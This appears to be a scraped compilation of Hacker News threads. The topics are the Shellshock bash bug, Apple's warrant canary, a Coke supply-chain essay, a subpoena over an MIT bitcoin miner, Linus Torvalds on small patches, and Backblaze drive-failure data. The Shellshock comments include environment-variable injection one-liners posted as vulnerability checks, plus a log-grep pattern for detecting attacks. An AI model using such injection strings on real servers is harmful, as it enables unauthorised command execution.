"Of course one means of mitigating this particular attack vector is simply to disable any CGI functionality that makes calls to a shell"

If you're on Ubuntu:

    a2dismod cgi    service apache2 restart
If you're NOT running any CGI scripts this will disable CGI support in Apache. Not sure if that takes care of things 100%, but might be helpful.

therealmarv 13 hours ago 1 reply      
Does anybody has steps what to do really as a sysadmin? Do I only need to install newest bash (on Linux systems) or do I also need to restart daemons like nginx/apache etc. ?
wodow 12 hours ago 1 reply      
Is there a (low volume) mailing list that would have alerted me to both this and Heartbleed?
jeletonskelly 12 hours ago 1 reply      
The only suitable logo for this vulnerability: http://img3.wikia.nocookie.net/__cb20080920183129/nintendo/e...
danso 12 hours ago 3 replies      
In another thread, I saw that this was an easy check to see if your bash was affected:

     env X="() { :;} ; echo busted" /bin/sh -c "echo stuff"
If you get "busted" back, then you're affected...which is what I get with Mac OS X 10.9...however, when I try it on an Ubuntu server (14.x) that hasn't been patched in awhile...I don't get the error...Er, why is that? I thought this pretty much affected every bash since 25 years ago?

(Someone else in this thread mentioned that Ubuntu uses dash...so...all modern Ubuntu servers are OK?)

monort 12 hours ago 0 replies      
On Linux dhclient-script is written in bash. If it is vulnerable, then connecting to open wifi can be exploitable via rogue DHCP server.
diyorgasms 12 hours ago 1 reply      
You can tail your access.log and grep the expression "\(?\s_\s\)?\s{|cgi" to get an idea if someone is trying to exploit your webserver. The cgi part will return a lot of false positives, but if you cannot disable cgi, you might as well track it being requested.
mrfusion 11 hours ago 2 replies      
I see how Apache passes request information through environment variables but I don't see how bash comes into play in typical CGI.

Is anyone up for educating me?

I see http request -> apache -> env variables -> php

What am I missing?

drdaeman 10 hours ago 2 replies      
Had anyone suggested and/or implemented something like building a tiny wrapper for bash that would clean environment and then execve("/bin/bash.vulnerable", argv, cleaned_envp)?
txutxu 11 hours ago 0 replies      
With only static content (all logic implemented via cron).

    $ grep nginx /etc/passwd    nginx:x:105:111:nginx user,,,:/nonexistent:/bin/false
And the only other service listening in this machine is SSH, but it's limited by iptables only to my home IP.

I think I'm safe. Now installing updates patches bash.

Anyway, I've seen that syntax before (I'm talking of years here), on #bash in freenode.

Simply nobody did apply this from a security view point in the channel...

Igglyboo 12 hours ago 3 replies      
Can anyone explain what I should do on OSX?

I've heard that replacing /bin/bash with a newer version of bash from homebrew or even zsh will work but is that going to break anything that assumes 3.2 bash??

spilk 12 hours ago 1 reply      
I've seen a lot of talk regarding the impact on embedded devices, but how many of these actually run GNU Bash? I can't think of many embedded devices that don't use Busybox instead.
earlz 11 hours ago 1 reply      
Has anyone constructed this exploit as a simple `wget` command?
muyuu 11 hours ago 0 replies      
Either of these will typically show you your running terminal:

ps -p $$

echo $0 (command name that was used to invoke the shell)

Not reliable:echo $SHELL (preferred shell for the user, not necessarily what is running)

Also note that you may want to remove/fix bash to make sure it doesn't get run by something else. A CGI script may run it despite you changing your default shell to something else.

therealmarv 12 hours ago 2 replies      
When comparing security warning from RedHat https://access.redhat.com/solutions/1207723 vs Ubuntu http://www.ubuntu.com/usn/usn-2362-1/ the RedHat one wants you to run /sbin/ldconfig or reboot your machine. Why Ubuntu does not recommend this? They do ldconfig automatically?
milankragujevic 9 hours ago 0 replies      
Here is a simple tool that you can use to check if your website is vulnerable: http://milankragujevic.com/projects/shellshock/
weavie 12 hours ago 2 replies      
I bet Microsoft are enjoying the fact that it is Linux that seems to have all the security vulnerabilities these days!
cyphunk 9 hours ago 0 replies      
I seem to remember somewhere on Show HN a service that lets one execute a command to populate an online pastebin. Something like: `cat | nc service.com 9199`. Now however I cannot find this service. Anyone know where?
AYBABTME 9 hours ago 2 replies      
I'm confused by this vuln report and all the attention.

If I don't run any CGI thing and I don't expose SSH without pubkey and only to trusted users, what is there for me to worry about?

magpi3 9 hours ago 0 replies      
Can the bug be avoided just by setting the default shell for your webserver's user (generally www-data in debian) to /bin/dash? At least from the perspective of Apache users?
Rabidgremlin 5 hours ago 0 replies      
mmm, just checked a couple of servers and found suspect activity :(

Also this test for vulnerability seems more accurate:

x='() { :;}; echo vulnerable' bash

TeeWEE 9 hours ago 1 reply      
The article points you you can run the following code to check you are affected:

    env X="() { :;} ; echo busted" /bin/sh -c "echo stuff"
However... This just shows that the bash installation has this problem. If your webserver that is running is not interacting with bash, then there is no problem at all.

So look at your webserver. Its not per-se a problem in bash. Its more a problem of webservers using bash directly.

Or is this bug more serious?

arielby 6 hours ago 0 replies      
ISC DHCP Client has a check_option_values function (at the end of dhclient.c), which (if it is properly used, I don't understand the surrounding code enough) should prevent this from being exploited.
Globz 9 hours ago 0 replies      
I tried the vuln on win-bash but nothing so far, it just doesn't give an error and doesn't echo out anything..
aembleton 13 hours ago 0 replies      
Excellent, a comprehensive write up on the issue. Exactly what I was looking for.
frankydp 12 hours ago 1 reply      
Is anyone able to get the echo test to pass after updating AWS bash?
EdSharkey 12 hours ago 0 replies      
This is why I don't run Apache on my servers. Too many crufty old plugins designed in the days of peace and love.

Give me servers running under JVM that do the focused few things they do very, very well.

lurkinggrue 9 hours ago 0 replies      
Can you test for this using curl?
ck2 12 hours ago 1 reply      
Keep an eye on the patches directory for whatever version you use:


Just had to manually patch a CentOS4 legacy system.

What I find interesting is the patch has been around since the 16th, what took so long and what finally lit a fire under the mainstream *nix releases?

Glan1984 11 hours ago 1 reply      
How about installing zsh and making that the default shell? Is that enough?
peterwwillis 12 hours ago 2 replies      
There's no way that this bug could affect even a fraction of the number of users Heartbleed did. The number of affected machines is probably 1/10000th that of heartbleed, and heartbleed exposed hundreds of millions of users, the SSL keys of servers, etc to attack. The fact that legacy CGI scripts are the only attack vector being discussed right now is proof enough of how outdated this bug is.

Keep in mind that hackers constantly take advantage of old exploitable legacy software in servers around the world to get a shell, and nobody freaks out about it.

Apples warrant canary disappears
406 points by panarky  7 days ago   93 comments top 15
kwhite 7 days ago 4 replies      
Is there any reason why a company could not apply the same concept of a warrant canary on a user-by-user basis?

Imagine seeing a message every time you log into your Gmail account informing you that Google has never been compelled to surrender your private data to a law enforcement agency.

panarky 7 days ago 1 reply      
Possible explanations:

1) It wasn't a canary to begin with, so its removal means nothing.

2) There's no legal precedent for disclosing a Section 215 order by killing the canary, so Apple removed it before they received a Section 215 order. That way it doesn't disclose anything and Apple avoids legal liability.

3) Apple really did receive a Section 215 order.

rrggrr 7 days ago 0 replies      
As explained by Apple:

In the first six months of 2014, we received 250 or fewer of these requests. Though we would like to be more specific, by law this is the most precise information we are currently allowed to disclose.


nl 7 days ago 1 reply      
Interesting and somewhat disappointing that it took a year for anyone to notice that it had disappeared. The appearance generated quite a lot of interest.

(Of course, I'm as responsible as anyone else for not noticing. I wonder if it would be possible to build a service to proactively check for their disappearance?)

UVB-76 7 days ago 2 replies      
Gee, thanks for the hat tip...


johnhess 7 days ago 4 replies      
Could a lawyer or someone with familiarity with warrants like these explain how a "warrant canary" is legal?

I understand the concept, but discloses something you can't disclose. They can compel you to lie/not comment if asked, "Hey, Apple, did you get any of those National Security Letters".

Is there a clear cut loophole or is this something yet to be challenged?

tkinom 7 days ago 1 reply      
I wonder what happen if Russian, China, India, Japan, EU all demanding same level of access to Apple's data.

Apple might not care about Iran or other smaller countries, but how is it going to deal with big market like China, India, EU?

chiph 7 days ago 0 replies      
Under what conditions would the warrant canary statement reappear? I'm thinking of those workplace safety signs: "This corporation has operated for [ 179 ] days without a Section 215 warrant being served"
crazypyro 7 days ago 0 replies      
Have any of the other major tech companies had similar canary disappearances? I only ask because this is the first time I've heard of one actually being used by a tech company as a warning flare.

I'd expect a governmental legal challenge...

MrJagil 7 days ago 11 replies      
I've asked this before to no avail, but what can the NSA possibly do if Apple refuses?

Fine them? Sure, they have billions.

They can't arrest the company... Is Cook going to jail? What is the actual threat here? You could argue that Apple has more power than many governments.

staunch 7 days ago 1 reply      
Apple should just declare that they have been subject to Section 215. Given how many users Apple has it can't reasonably be argued that such a disclosure would be a danger to national security.

Hopefully they would end up before SCOTUS and help defang the USA PATRIOT Act.

stevewepay 7 days ago 0 replies      
So now what? Now that the canary has disappeared, is there no other information that can be transmitted to us? It feels like it's a binary signal that just got set permanently, so there's no more information we can glean from it.
ForHackernews 7 days ago 1 reply      
Very interesting in light of this: https://news.ycombinator.com/item?id=8333258
maresca 7 days ago 0 replies      
Perhaps this is the reason for all of the security updates in iOS 8.
What Coke Contains (2013)
406 points by fmela  6 days ago   176 comments top 33
d0mdo0ss 6 days ago 4 replies      
> coca-leaf which comes from South America and is processed in a unique US government authorized factory in New Jersey to remove its addictive stimulant cocaine

According to Wikipedia "The Stepan Company is the only manufacturing plant authorized by the Federal Government to import and process the coca plant, which it obtains mainly from Peru and, to a lesser extent, Bolivia. Besides producing the coca flavoring agent for Coca-Cola, the Stepan Company extracts cocaine from the coca leaves, which it sells to Mallinckrodt, a St. Louis, Missouri, pharmaceutical manufacturer that is the only company in the United States licensed to purify cocaine for medicinal use."

Someone1234 6 days ago 11 replies      
I wish Coca Cola would make a acid free version of coke. The Phosphoric Acid adds a slight tang to the drink, but in exchange absolutely destroys your teeth over years of consumption.

For regular drinkers like myself I'd happily pay a small premium to buy the "acid free" version of the drink. The sugar still does damage but with both the acid AND sugar it is like a double whammy of "badness" (acid which destroys your teeth's natural protective coating, and sugar to feed the bacteria which actually eat away at your teeth).

No amount of brushing can really undo the amount of damage acidic soda does to your teeth, trust me I know! Even with prescription toothpaste with fluoride 5x times stronger than normal (5000 ppm toothpaste Vs. 1100 ppm) you're only slowing down the progression.

jstalin 6 days ago 4 replies      
The same type of story as the classic "I, pencil," published in 1958:


srean 6 days ago 1 reply      
The article waxes so eloquently about this beloved product that I would have mistaken it for a paid PR piece. The article is great read nonetheless.

For those who are also interested in the other darker, grimier side of the same coin, might want to check out its use of mercenaries for union busting in South America(by murder of course. In the hands of the right spinners that would be 'terrorism'), similar stuff happened in India as well.



klinquist 6 days ago 3 replies      
You can make your own almost-Coke... OpenCola, the open-source cola.


gokhan 6 days ago 9 replies      
> The number of individuals who know how to make a can of Coke is zero.

This reminds me a fact I remember time to time. If civilization collapses after, say, a world war, I most probably can't make a pot, can't grow plants, can't differentiate if one is edible or not, can't dig for petrol, can't make plastic (or even glass), can't reinvent concrete, can't make gunpowder etc., you get the point.

I can only write software and maybe drill with tools and nail with a hammer but that's all.

bjornsing 6 days ago 3 replies      
> The top of the can is then added. This is carefully engineered: it is made from aluminum, but it has to be thicker and stronger to withstand the pressure of the carbon dioxide gas, and so it uses an alloy with more magnesium than the rest of the can.

Nope, the pressure from the carbon dioxide pushes equally against all sides of the can. If anything the pressure at the top is slightly lower than at the bottom, at least if the can is standing, because of the weight of the coke pushing against the bottom.

vesche 5 days ago 0 replies      
> ... the inside of the can is painted toowith a complex chemical called a comestible polymeric coating that prevents any of the aluminum getting into the soda.

I though this was very interesting, so I did a little digging... There is remarkably little information on these 'comestible polymeric coatings', but I was able to find (see below) a reason as to why that is. Apparently these coatings are propriety to the manufacturer and there are competing companies who are constantly in a race to find the best coating.

It's supremely interesting the fact that drinking a can of coke is almost a magic trick right in front of your eyes. It'd be like someone holding a lighter straight to a piece of paper and everyone being baffled as to why it isn't lighting on fire. Yet when someone drinks a coke no one bats an eye as to how it isn't mixing with the metal salts and eating straight through the aluminum can.

"Interior can coatings designed to prevent migration of metal salts into the contained product are called "comestible polymeric coatings". The coatings ars polymers typically used in coil coating. The exact nature of the coatings isn't available since most are proprietary to manufacturers who continuously look for better coatings."

source: http://www.eng-tips.com/viewthread.cfm?qid=258261

JacobAldridge 5 days ago 1 reply      
Actually, the Pinjarra process creates Aluminium. The process of shipping it to Long Beach CA converts it into aluminum.
neya 5 days ago 2 replies      
I'm surprised that the author hasn't mentioned the use of toxins (pesticides)[1], to the extent that it is even being used as a real pesticide in various parts of India.

I know some may find this offensive, but sorry, I think I have a moral responsibility myself to let the people around me know of the harms caused by this carcinogen[1].



makmanalp 6 days ago 0 replies      
My favourite version of this is a picture of a boeing 787 and where all the parts are manufactured: http://seattletimes.com/art/news/business/boeing/787/partsen...

Of course if you could break it down further into smaller parts and tools to manufacture those parts, you'd get an even greater variety of countries and companies.

The center where I work actually does work slightly related to this, https://www.youtube.com/watch?v=0JC24CBVsdo

Theodores 6 days ago 1 reply      
You could say this about any product. I think the essay would be considerably longer if it concerned a typical PC or phone, not to mention a car.

I also think the essay can be written with cynicism instead of wonder, e.g. with an anti-capitalist slant. With one innocuous affordable purchase you can deforest and pollute four continents whilst giving yourself diabetes and dental caries!!!

gburt 6 days ago 0 replies      
I am reminded of I, Pencil. [1]

[1] http://www.econlib.org/library/Essays/rdPncl1.html

jeffbarr 6 days ago 2 replies      
This is my favorite sentence of the article:

> Modern tool chains are so long and complex that they bind us into one people and one planet.

When we think about colonizing the Moon or Mars with small groups of people with the intention of making the colonies self-sustaining over time, deep, long-evolved tool chains like the one described in the article could be very difficult to scale down and to replicate in other environments.

raverbashing 6 days ago 1 reply      
"The top of the can is then added. This is carefully engineered: it is made from aluminum, but it has to be thicker and stronger to withstand the pressure of the carbon dioxide gas, and so it uses an alloy with more magnesium than the rest of the can"

Yes, but the pressure is the same on all parts of the can. Ok, almost the same, still.

Maybe because of the parts that have been cut to make it easy to open?

Tloewald 4 days ago 0 replies      
This article reminds me strongly of a pivotal passage in the novel Gain, by Richard Powers (which I can't recommend highly enough, although it's a downer). In that passage he describes how a disposable film camera is made.
AlyssaRowan 5 days ago 0 replies      
Not that I want to waste any time on a HPLC-MS machine on this, but I was distinctly under the impression Coca-Cola 7X does not actually contain kola nut?

I've had Red Bull Cola, and actually found it quite different, but delicious. No accounting for taste, though.

NotOscarWilde 6 days ago 2 replies      
Speaking as somebody who's never even smoked a cigarette or a joint: are there people who tried to recreate the "original" coke recipe? The one with "unprocessed" coca leaves? Is it available on say the latest instance of Silk Road? What is it like?
lpolovets 5 days ago 0 replies      
There's a book with a similar theme about Twinkies. It's called "Twinkie, Deconstructed" (http://www.amazon.com/gp/product/B000OZ0NZS)
exacube 5 days ago 2 replies      
How can 0 people know what's in Coke while still getitng it FDA approved? Surely this can't be true.. How does the company know how to make a can of coke if they don't know how it's put together?
TazeTSchnitzel 6 days ago 1 reply      
> The number of individual nations that could produce a can of Coke is zero.

While this is true in that no individual nation could produce Coke with the exact same formula, an individual nation could surely produce a soft drink.

Istof 6 days ago 1 reply      
"[...] and the edges of the can are folded over it and welded shut."

I never thought there was any weld in a soda can... (and I still don't think there is any)

cbhl 6 days ago 1 reply      
Article title should probably contain (2013).
justintocci 6 days ago 1 reply      
i wonder what the failure rate on the interior coating is? How often are people ingesting disolved aluminum?
swartkrans 6 days ago 1 reply      
Is the ammonia dangerous? Or can it be? How much ammonia can a person consume before it becomes dangerous?
alecco 6 days ago 1 reply      
To keep you drinking they add plenty of sodium (50mg+) masked with sugar, HFCS, or sweeteners. They also add caffeine as a diuretic to keep consumers drinking, too. And then they market it to children, lovely people.

Check out Dr. Robert Lustig videos. Also, the book Salt, Sugar, Fat, about food industry engineering.

yarou 6 days ago 0 replies      
He forgot to mention the Colombian paramilitaries that break up Coke bottling plant unions by kidnapping their children. Funny how "globalization" is presented in a saran-wrapped, sanitized version.
InclinedPlane 5 days ago 0 replies      
This is good, although I think it reaches just a little too far when it says that the number of nations that could produce a can of coke is zero. If the US so desired it could grow coca leaves, and kola nuts, and use locally produced aluminum, etc.
Smachine 6 days ago 0 replies      
Think of all of the jobs the making of Coke provides. Oh here we go......lol
argumentum 6 days ago 0 replies      
A brilliant paean to the free market and the invisible hand. Milton Friedman once described the manufacture of a humble pencil in this way.

(edit: just saw a link to an essay entitled "I, Pencil" at the bottom .. this might have pre-dated Friedman).

WiggleYourIndex 5 days ago 0 replies      
Clean water tastes better.
joshfraser 6 days ago 1 reply      
1 can of coke contains 160% of your recommended daily intake of sugar. But you won't see that on the label because money.
MIT Students Battle State's Demand for Their Bitcoin Miner's Source Code
413 points by msantos  3 days ago   123 comments top 25
will_brown 3 days ago 4 replies      
There is a lot of confusion in this thread regarding basic concepts of the law.

1. The NJAG is not prosecuting the MIT student(s) (at least not yet). Therefore, this is not similar to the alleged overzealous prosecutors in the Swartz case.

2. A subpoena is a writ compelling testimony or evidence. A subpoena is not synonymous with being a defendant.

3. NJAG served one MIT student with a subpoena to turn over documentation (source code, downloads, users, ect...)for a program which maybe being used by third party websites in a way that violates the rights of NJ residents vis-a-vis unauthorized access to computer systems.

4. It seems there is an issue raised arguing NJAG does not have jurisdiction over the MIT student(s). Personally I would find this analysis the most compelling because it is at the intersection of where facts and law meet.

5. EFF is arguing that complying with the subpoena may violate the students right against self-incrimination. I think this is a losing argument where one's right against self-incrimination is rather limited, generally to information contained within their mind and not typically extended to documentation and records.

6. Though this is not at issue, it would be almost impossible for the MIT student(s) to have committed a crime, as the crime would require intent. It would be nearly impossible to prove the student(s) intended that their code be downloaded by third-party websites for the specific purpose of running on the end users computers without their knowledge. It would be on par with charging a gun manufacturer criminally for intending that their guns be manufactured and sold for the exclusive purpose of committing crimes.

bertil 3 days ago 3 replies      
That article describes a though experiment that would A. remove an ad, and B. should (but doesn't) trigger a BitCoin miner. It's clearly marketed as an illustration to an idea. I'm failing to see the consumer fraud. Is this like accusing a car-manufacturer of manslaugher because they latest concept-car didn't have seat-belts?

I would like to know if that's selective reporting from Wired, or spectacular fishing from NJ state atorney.

Also, neither the hackathon, nor MIT appear to be in NJ: what is their jurisdiction? Those two issues should be clarified in any basic coverage of the incident: at this point, it is plain bad reporting.

eli 3 days ago 1 reply      
The EFF has the actual documents in the case posted https://www.eff.org/cases/rubin-v-new-jersey-tidbit

Based on a quick skim, this is the closest NJ comes to making a case: https://www.eff.org/document/nj-attorney-general-response-ef...

teachingaway 3 days ago 1 reply      
New Jersey's Position is laid out in their 3/7/2014 filing. https://www.eff.org/files/2014/03/07/njs_memo_in_opposition_...

Here's the relevant parts (lightly edited):

The Division issued the Subpoena and Interrogatories in furtherance of its investigation into an entity called Tidbit. Tidbit is a group of students who developed a software code that may have hijacked the computer resources of consumers within the State of New Jersey and improperly accessed and/or used such computer resources to mine for bitcoins for the benefit of Tidbit and its customers and without any notice to, or obtaining consent from, New Jersey consumers, in possible violation of the New Jersey Consumer Fraud Act ("CFA") and Computer Related Offenses Act ("CROA"). Bitcoins are a digital medium of exchange that can be traded on online exchanges for a dollar value. Bitcoins are "mined" through the use of computer resources to solve complex algorithms. Many times, consumers' computer resources are unknowingly accessed by entities through software code or otherwise in order to mine for Bitcoins.

Plaintiff's own description of its services strongly suggests that the code it developed is, in fact, designed to hijack consumer's computers. .... Further, contrary to Plaintiffs allegations in its brief, the Division specifically found Plaintiff's code on the websites of entities located in New Jersey. Furthermore, the Division determined that the code was active.

The following representations, among other things, are made on the Tidbit Website: "Monetize without ads"; "Let your visitors help you mine for Bitcoins;" and "Built on the bleeding edge." The Tidbit Website further provides: "How does it work? ... [1] Make an account - Sign up with your Bitcoin wallet ... [2] Paste the code - we'll give you a snippet to put in your website ... [3] Cash Out! - We'll send a transaction to your Bitcoin wallet." ...

E. The Division's Undercover Investigation

On February 7,2014, the Division re-accessed the Tidbit Website and "Sign up" button. While on the Tidbit 'Website, the Division submitted Sign-up Information to Tidbit using an undercover e-mail address and an undercover bitcoin wallet id. In response to receiving the Division's undercover Sign-up information, Tidbit sent the Tidbit Code to the Division's investigator via a confirmation page on the Tidbit website ("Confirmation Page"). The Tidbit Code that the Division received includes the Division's undercover bitcoin wallet id. Additionally, among other things, the Confirmation Page states: "Your embed code - Paste this at the bottom of your HTML page, and your visitors will start mining Bitcoins for you!" (emphasis in original).)

JacobEdelman 3 days ago 3 replies      
I feel like this article is a bit one sided. It doesn't ever state NJ's case against the students and draws strong parallels to Aaron Swartz (a hero to many people). A lot of the time these parallels seem to be weak, the student who did this is an MIT student who built a piece of software at a hackathon, this has almost nothing to do with Aaron Swartz's situation except it involves a young programmer and MIT.
downandout 3 days ago 0 replies      
There is an option in all browsers to disable javascript. That, combined with the fact that you are requesting files from a website (as opposed to them being surreptitiously forced onto your machine) implies consent to execute the code sent to you. Finally, the code made no attempt to go beyond user-granted access limits (in this case the ability to run javascript in the browser, a decision which is entirely under the control of the user).

I cannot see how a fraud or hacking case of any kind could be made here, even if they got the code.

borlak 3 days ago 0 replies      
Tidbit inspired me to write my own web-miner, which I open sourced. It's hacked together as I was really just trying to learn how the cryptocoin&mining stuff worked. The mining rate you get with straight javascript is truly abysmal, even with web workers (much worse than the standard cpuminer).

I found a couple examples that do the scrypt part with GPU in browser, but your browser has to support custom shaders, I think (I forget the details), and the version most browsers support doesn't allow this (again, my memory is sketchy about the details).

Anyway Here you go, NJ! https://github.com/borlak/cryptocoin_scrypt_stratum

csense 3 days ago 2 replies      
Don't users implicitly consent to a website using their CPU and bandwidth for arbitrary tasks while the website is open, by using a browser that downloads and runs arbitrary JavaScript and allows it to XMLHTTPRequest?

Even if the code in question was being run on a publicly accessible website, was used by a New Jersey consumer, and was fully functional and actually mined Bitcoins (all of those points are disputed by the students' counsel)...The only thing that's being taken by the website operators would be users' CPU cycles and bandwidth. And if the users have implicitly consented to the website's arbitrary use of those resources, how is anyone being harmed?

tgb 3 days ago 5 replies      
What law did they supposedly break?
lotsofmangos 3 days ago 2 replies      
They want source code for a client side javascript miner that they saw on a website. Was their right mouse button broken?
joshdance 3 days ago 2 replies      
This seems insane to me. What law was broken? What could even be considered remotely criminal about this? Seems like a gross over reach by the gov.
peter303 3 days ago 1 reply      
I'd curious to find out why NJ AG would get so paranoid about this? I couldnt really find a link to their side of the story.

The Natinal Science Foundation did discipline a researcher who did some mining on their computers.

Cogito 3 days ago 0 replies      
Perhaps most interesting in my reading of the documents provided by the EFF is the correspondence regarding the counter-sue made by Rubin against the NJAG.

In it NJAG lay out exactly what they think Rubin did:

...Plaintiffs development, use and deployment of the Tidbit Code which, by plaintiffs own description, strongly suggests the code was designed to hijack consumer's computers to mine for bitcoins, including the computers of New Jersey consumers. Further, prior to the issuance of the Subpoena and Interrogatories, the Division determined that the Tidbit Code was present and active on the websites of entities located in New Jersey and Plaintiff affirmatively sent the Tidbit Code to the New Jersey based entities.

They posit that the code was

1. Designed to hijack a consumer's computer for the purpose of mining bitcoins

2. The computers targeted for hacking (implicitly the entire internet) include those of New Jersey consumers

3. The code was found on websites owned by New Jersey entities

4. Rubin sent the code "affirmatively" to those New Jersey entities

I think 1. is the weakest point, but that weakness is based on my understanding of the definition of 'hijack'. 2. and 3. seem to follow easily from assumptions, or could be easily shown as fact. 4. seems like it would be harder to prove, but I don't know the implications of the term affirmatively used here.

everettForth 3 days ago 0 replies      
This sounds like some trivial code, not even fully functioning, that was written during a hackathon. Why does New Jersey care?

It wouldn't even make sense as a business model anymore, because asic miners are so much more efficient than GPUs, but I heard many people talking about building this kind of service years ago.

NJ could pay a software developer to write them code to let people generate small amounts of bitcoin in a browser. Why would they possibly want this MIT student's code so badly?

codexon 3 days ago 1 reply      
I don't understand how their javascript based miner is feasible.

Mining bitcoins with a CPU is an extremely futile endeavor, and on top of that, it is implemented in asm.js.

Even with thousands of workers, GPU and ASIC mining is anywhere from hundreds to over a MILLION MH/S while modern cpus top out at 20 with most around 5.


chris_wot 2 days ago 0 replies      
Funny how voting machine companies won't release their source code, but MIT must for Bitcoin? Just a thought.
larssorenson 3 days ago 0 replies      
I don't understand how it could be considered consumer fraud or computer fraud and abuse if it was clearly indicated to the visitor that their browser would be used as a BitCoin miner in lieu of being displayed Ads. Assuming they weren't told, I could see the issue but it didn't seem like they were trying to dupe visitors.
squozzer 3 days ago 0 replies      
It sounds to me like NJ wants to start mining bitcoin. Nothing is sacred when you're running a deficit I guess.
trhway 3 days ago 0 replies      
they need to bring in a couple of seasoned enterprise developers who can hand off any project in such a state that it would be easy to rewrite it from scratch than to even just successfully build it, less run/debug/understand...
ndesaulniers 3 days ago 1 reply      
Thesaurus 3 days ago 1 reply      
Is there another website other than wired with this article?
u124556 3 days ago 1 reply      
They could just, you know, give it to them?
javajosh 2 days ago 0 replies      
How is surreptitious use of compute resource any different than the surreptitious accumulation and analysis of data exhaust? If this moves forward to prosecution, I'd argue it will actually open up an avenue of attack against Facebook, Google, et al.
joshfraser 3 days ago 2 replies      
We're lucky to have an organization like the EFF that fights this nonsense. It's a good time to support their work.


stealthlogic 3 days ago 0 replies      
Fuck New Jersey.
The biggest thing with small patches (2004)
383 points by ohmygeek  1 day ago   37 comments top 13
doughj3 1 day ago 0 replies      
I think this is great advice. While I've only contributed to a couple open source projects and haven't lead my own large ones, I completely agree. There's more to submitting patches than writing the patch- understanding contribution guidelines (code style, documentation, testing), responding to feedback, etc, these are all extremely important in actually contributing to a project. And having even just that little patch merged in feels great when you're starting out.

Plus, no one wants to make a big helpful functional contribution only to be thrown away because they weren't aware of how the community operates. Small patches have a low risk as far as learning about how to contribute, even if the patch is rejected for whatever reason.

Though this seems somewhat obvious, it's nice to have it stated and validated by the leadership of one of the largest open source projects.

efuquen 1 day ago 1 reply      
Great attitude. Linus has had plenty of heated moments on the mailing lists, but 1) he's often right and 2) his venom is usually reserved for experienced developers that really should know better. Glad to him being so open and accepting with newbie kernel hackers.
shurcooL 1 day ago 0 replies      
That makes a lot of sense. If I look at any project I've contributed to, it always started out with something small. Taking the time to make a small PR that makes a tiny improvement:

- shows you care about improving the project; you took the time to improve something small that others would ignore

- lets you test the waters. Are the project owners receptive of changes? Is it pleasant trying to contribute to the project? Or do they ignore your patch and don't reply for 2 weeks. You wouldn't want to spend a lot of effort just to find that out.

- gives you a chance to become familiar with the process, the tools, gain practice, and hopefully get rewarded with your change being accepted

For example, my first CL to Go was a trivial change:


But without having done that (and having a good experience) I couldn't have been working on more complicated changes like https://codereview.appspot.com/142360043/ now.

munificent 1 day ago 0 replies      
Small patches are the "hello world" of open source. They give you a chance to get familiar with and work through the contribution pipeline before you push something sizeable through.

There's little useful about "hello world" as a program, but it ensures you've got your toolchain working correctly, which is a necessary precondition for doing real work. Trivial patches are like that.

ljosa 1 day ago 2 replies      
Ten years later, how is the Linux kernel community doing in terms of cultivating new contributors?
post_break 1 day ago 0 replies      
Reminds me of Lawrence of Arabia. "Big things have small beginnings" I've contributed tiny bug fixes and the feeling was great. I did that, me.
JacobEdelman 1 day ago 4 replies      
Is it just me or is the main reason this is being upvoted so much is because Linus said something without a bad attitude? This isn't a rhetorical question, I honestly want to know.
coherentpony 1 day ago 0 replies      
That, ladies and gentlemen, is how you grow a community.
tehwalrus 1 day ago 0 replies      
I completely agree. The only thing that's topped getting a tiny patch of my own accepted (into pylibtiff) was someone getting me to put a python module I'd written* onto pypi. Both were great feelings, and it's extremely important to encourage such highs in new people contributing to open projects (Linux kernel or random bibtex editor alike.)

* the library was in fact just a python wrapper for some C++ code, but that's where leverage for the original author starts, in bindings.

vezzy-fnord 1 day ago 1 reply      
Seems like it's good to remind people every now and then that Linus is a human with empathy, since a lot of them really don't understand the reasons for when he rants, and then start to draw conclusions.

On a related note, Theo de Raadt rants need far more attention than they currently get.

mwfogleman 1 day ago 1 reply      
Woah, mentoring Linus had a good day!
GhotiFish 1 day ago 1 reply      
That's a good attitude. If I find myself heading an open source project, I'll take that advice with me.
qwerta 1 day ago 1 reply      
You need good set of unit tests if you want to survive managing open-source project.
Hard Drive Reliability Update Sep 2014
378 points by nuriaion  2 days ago   158 comments top 25
disordr 2 days ago 3 replies      
I really want to applaud backblaze for publishing these reports and stats. Too many companies closely guard this information that really helps the larger community. Based on the previous blogs from backblaze, when I built out our new hadoop cluster, I purchased 1450 Hitachi drives. I plan to gather our failure rates and publish them as backblaze does.Thanks for blazing the path!
zaroth 2 days ago 8 replies      
Since annual failure rate is a function mostly of age, it would be interesting to see a line chart of cumulative failure rate vs age. But since new drives are continually being added to the population, there would be fewer drives in the data set as you moved up each curve.

I guess you could calculate confidence intervals at quarterly intervals, and so the error bars would get larger as age increases and 'n' decreases.

How would you calculate the CI for failure rate? It's not binomial or poisson, since failure rate goes to 1 over time...

A little searching turns up http://rmod.ee.duke.edu/statistics.htm which I'm sure completely explains how to do this... (rolls eyes). I hate that this is how statistics is commonly taught. Knowing which distribution to use and applying it correctly can actually be intuitive if taught properly. It doesn't always need to be an exercise in alphabet soup / deriving from base principles.

ChuckMcM 2 days ago 1 reply      
One of the challenges I have with this analysis is that a 'failure' isn't just that your drive is no longer working, it is that your drive isn't working and you have to go replace it. The operational costs of replacing a drive have three parts, loss of production while the drive is offline, operator time to physically replace the drive and prep it for re-entry into the system, and transactional costs of doing a warranty replacement (filling out the RMA form, getting a valid RMA, shipping the and receiving replacements). We minimize the latter by doing RMAs in batches of 20 but its still a cost across those 20 drives. (and the population of 40 drives which exist as spares are effectively not available for production). It isn't as simple as 'sure drives fail a bit more often but we don't expect to use them that long.'
michaelbuckbee 2 days ago 3 replies      
Biggest takeaway was at the end, with the "enterprise" drives being slightly less reliable than the consumer ones at half the cost.
emodendroket 2 days ago 8 replies      
How times have changed; Seagate used to be (or at least have the reputation of being) the most reliable and Hitachi the least.
shiftpgdn 2 days ago 2 replies      
I manage a computation cluster for an oil and gas exploration company. We have a 50% failure (and rising!) of Seagate Constellation drives in 250GB, 1TB and 2TB configurations. My sample size is fairly small at a few hundred drives but man does it keep me busy.
archgrove 2 days ago 1 reply      
Not that I use even 0.001% of the disks that BackBlaze go through, but my anecdata suggests the same. The only dead hard disks I have on my desk at the moment are Seagate, and they dominate the disks I've sent back in the last few years.

However, they are cheap, and they do honour their warranties. Would just be nice if they didn't have to quite so much.

saosebastiao 2 days ago 2 replies      
Tangential: When are you going to offer a linux client?
GravityWell 13 hours ago 0 replies      
This is extraordinarily useful and unique. My compliments to Backblaze for making this available. This is the type of empirical data I would love to have for as many things as possible: SSDs, monitors, TVs, kitchen appliances, tablets, cars, etc.
tambourine_man 2 days ago 3 replies      
